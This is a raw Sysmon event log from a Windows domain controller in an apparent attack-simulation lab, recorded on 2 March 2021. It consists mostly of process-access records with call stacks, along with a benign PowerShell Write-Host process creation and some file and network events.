16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6DAA-603E-B3AA-00000000AD01}1088011456C:\Windows\system32\conhost.exe{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.973{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.951{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DAA-603E-B3AA-00000000AD01}10880C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.951{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.951{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.951{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.951{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.951{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.951{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002239942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.960{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -C Write-Host 3a44f779-bddf-4205-ad37-da658d3292b6C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 354300x80000000000000002239941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:52.288{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60146-false10.0.1.12-8000- 23542300x80000000000000002239940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.435{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF128B88F4C4C9D66EECD9A5DCC57396,SHA256=38ADDE759CEEB4BE70AC943641890C536062C5E9964E98C31329777FEED30B77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.154{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3382DF3D35A53A82D15AF841EE177804,SHA256=BD4417E95FD662196DFD12B24122FBB80DDBAE9F9FBDE0A39239E1E88F4C9DD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.935{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.857{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.826{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.826{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.775{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.775{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002240734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 